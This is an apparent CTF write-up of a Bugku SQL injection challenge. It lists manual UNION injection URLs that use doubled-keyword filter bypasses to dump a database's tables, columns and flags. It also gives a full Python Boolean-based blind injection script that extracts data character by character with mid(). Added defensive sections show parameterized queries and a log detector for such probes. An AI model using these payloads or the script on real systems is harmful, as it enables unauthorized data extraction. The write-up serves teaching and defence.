BUGKU multiple injection: manual injection + blind injection script

This article walks through the manual SQL injection steps and the reasoning behind them, then gives the Boolean-based blind injection script.

http://123.206.87.240:9004/1ndex.php?id=1

http://123.206.87.240:9004/1ndex.php?id=1'   error

http://123.206.87.240:9004/1ndex.php?id=1'--+   normal, so injection is present

http://123.206.87.240:9004/1ndex.php?id=1' and 1=1--+   error, so something is being filtered

http://123.206.87.240:9004/1ndex.php?id=1'^(length('and')!=0)^'

Use length() to determine whether a keyword is filtered: if 'and' is stripped to an empty string, length() is 0 and the page returns normally. and, or, union and select are all filtered.

http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2--+   normal; writing the keyword twice bypasses the filter

http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3--+   error, so there are two columns

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,2--+   normal, echo at position 2

Position 2 is echoed, so inject into the second column.
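The bypass above works because the filter deletes each keyword once, so "uunionnion" collapses to "union". The following example is added here for defenders and is not code from the original writeup or the challenge: it models that single-pass filter against a fixed-point version, and puts the concatenated (vulnerable) query beside a parameterized (hardened) one on a constructed in-memory SQLite table. The keyword list, table layout and function names are assumptions; SQLite's `--` comment syntax stands in for MySQL's `--+`.

```python
import re
import sqlite3

# Keywords the challenge's filter strips, as observed on the page (assumed list).
FILTERED = ("union", "select", "and", "or")


def strip_once(s: str) -> str:
    """Single-pass keyword removal: deletes each keyword one time, case-insensitively.
    This is the bypassable shape: removing 'union' from 'uunionnion' leaves 'union'."""
    for kw in FILTERED:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s


def strip_until_stable(s: str) -> str:
    """Repeat the same removal until nothing changes (fixed point), so doubled
    keywords cannot survive. It is still a blocklist and mangles innocent text
    such as 'password', which is why it is not the real fix."""
    while True:
        nxt = strip_once(s)
        if nxt == s:
            return s
        s = nxt


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the challenge's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable shape: single-pass filter, then string concatenation into SQL."""
    query = f"SELECT id, title FROM news WHERE id = '{strip_once(user_id)}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened shape: the value is bound as a parameter and is never parsed as SQL."""
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The page's doubled-keyword payload, with SQLite's comment syntax.
    payload = "1' aandnd 1=2 uunionnion sselectelect 1,'injected'--"
    print(strip_once(payload))           # the filter hands back a valid UNION query
    print(strip_until_stable(payload))   # the fixed point leaves no keyword behind
    print(lookup_unsafe(conn, payload))  # the attacker-chosen row comes back
    print(lookup_safe(conn, payload))    # no row: the whole string is one id value
```

The parameterized lookup returns nothing for the payload not because it recognises an attack but because the string is compared as a single value against the id column; that property holds for any input, which a keyword blocklist can never guarantee.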

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,database()--+

Database name: web1002-1

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

Tables: flag1, hint

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+

Columns: flag1, address

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(flag1) from flag1--+

flag1 content: usOwycTju + FTUUzXosjr. Submitting it is rejected; the hint says there are two flags and that the flag is lowercase.

http://123.206.87.240:9004/1ndex.php?id=1' aandnd 1=2 uunionnion sselectelect 1,group_concat(address) from flag1--+

The address column points to the next level; open it: http://123.206.87.240:9004/Once_More.php?id=1

http://123.206.87.240:9004/Once_More.php?id=1'   error

http://123.206.87.240:9004/Once_More.php?id=1'--+   normal, so injection is present

http://123.206.87.240:9004/Once_More.php?id=1' order by 2--+   normal

http://123.206.87.240:9004/Once_More.php?id=1' order by 3--+   error, so there are two columns

http://123.206.87.240:9004/Once_More.php?id=1'^(length('union')!=0)^'   normal, so union is filtered

http://123.206.87.240:9004/Once_More.php?id=1' and 1=2 uunionnion select 1,2--+   writing the keyword twice does not bypass it

http://123.206.87.240:9004/Once_More.php?id=1' and 1=2 Union select 1,2--+   changing case does not bypass it

http://123.206.87.240:9004/Once_More.php?id=1'^(length('sleep')!=0)^'   normal, so sleep is filtered as well; substr is also filtered

Since a true condition and a false condition return different pages, write a Boolean-based blind injection script instead (it uses mid() because substr() is filtered).

import sys
import requests
from bs4 import BeautifulSoup


url_start = 'http://123.206.87.240:9004/Once_More.php?'

# Each template tests one character: does position {0} of the result equal {1}?
sqldb = "id=1' and mid(database(),{0},1)='{1}'--+"
sqltb = "id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema = database()),{0},1)='{1}'--+"
sqltest = "id=1' and mid((select group_concat(column_name) from information_schema.columns where table_name ='flag2'),{0},1)='{1}'--+"
sqlflag = "id=1' and mid((select flag2 from flag2),{0},1)='{1}'--+"


def Brup(SQL):
    name = ''
    for i in range(1, 40):
        for ch in range(32, 129):
            if ch == 128:
                # no printable character matched at this position: the string has ended
                sys.exit(0)
            payload = SQL.format(i, chr(ch))
            url_all = url_start + payload
            # print(url_all)
            html = requests.get(url_all)
            soup = BeautifulSoup(html.content, 'html.parser')
            # the "true" page contains this text, the "false" page does not
            result = soup.find_all(string='Hello,I Am Here!')
            # check whether the result list is empty
            if len(result):
                name += chr(ch)
                print('name:' + name)
                break


if __name__ == '__main__':
    # Brup(sqldb)
    # Brup(sqltb)
    # Brup(sqltest)
    Brup(sqlflag)
    # tablename: class, flag2
    # Note: the result comes out in capitals (the comparison is case-insensitive); the flag is all lowercase.

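A defender-side companion to the script above, added here and not part of the original writeup or the challenge: it scans web-server access-log lines for the shape of the probes that script sends (a one-character mid()/substr() comparison that walks positions one by one) and flags any client that issues many of them. The log lines, client addresses, response sizes, threshold and log format are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One-character extraction compare: mid(<expr>,<pos>,1)='<c>' (also substr/substring).
PROBE_RE = re.compile(
    r"\b(mid|substr|substring)\s*\(.+?,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*(=|<|>|<=|>=|!=)\s*'(?P<ch>[^']*)'",
    re.IGNORECASE,
)
# Common log format (assumed): ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)


def _log_line(ip: str, sec: int, target: str, size: int) -> str:
    """Build one constructed log line (helper for the sample data below)."""
    return (f'{ip} - - [10/Sep/2019:10:00:{sec:02d} +0800] '
            f'"GET {target} HTTP/1.1" 200 {size}')


# Constructed sample log: one ordinary visitor and one client walking positions 1..3.
_PROBES = [(1, "a"), (1, "b"), (1, "w"), (2, "a"), (2, "e"), (3, "b")]
SAMPLE_LOG = [
    _log_line("10.0.0.5", 1, "/Once_More.php?id=1", 512),
    _log_line("10.0.0.5", 2, "/Once_More.php?id=2", 530),
] + [
    _log_line("10.0.0.9", 3 + n,
              f"/Once_More.php?id=1%27+and+mid(database(),{pos},1)=%27{ch}%27--+",
              512 if ch in "we" else 410)  # constructed: a correct guess returns the "true" page
    for n, (pos, ch) in enumerate(_PROBES)
]


def parse_line(line: str):
    """Parse one log line into a dict, URL-decoding the request target; None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["target"] = unquote_plus(rec["target"])  # %27 -> ', '+' -> space
    return rec


def find_probe(target: str):
    """Return (position, guessed char) if the decoded target looks like a one-char oracle probe."""
    m = PROBE_RE.search(target)
    if not m:
        return None
    return int(m.group("pos")), m.group("ch")


def detect_blind_enumeration(lines, min_probes: int = 5) -> dict:
    """Group probe-shaped requests per client; flag clients at or above the threshold.
    Returns {ip: {"probes": count, "positions": sorted positions walked}}."""
    probes = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        p = find_probe(rec["target"])
        if p is not None:
            probes[rec["ip"]].append(p)
    flagged = {}
    for ip, plist in probes.items():
        if len(plist) >= min_probes:
            flagged[ip] = {"probes": len(plist),
                           "positions": sorted({pos for pos, _ in plist})}
    return flagged


if __name__ == "__main__":
    for ip, info in detect_blind_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {info['probes']} probes over positions {info['positions']}")
```

Matching on the probe shape rather than on the keyword alone keeps the false-positive rate low: a single mid() call in a URL is unremarkable, but dozens of them from one client with a rising position argument are the fingerprint of character-by-character extraction. The two distinct response sizes in the sample (512 for the "true" page, 410 for the "false" page) are the oracle itself; alerting on a client that alternates between exactly two sizes is a useful second signal when the parameter is not visible in the log.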


Source: www.cnblogs.com/Zhu013/p/11483305.html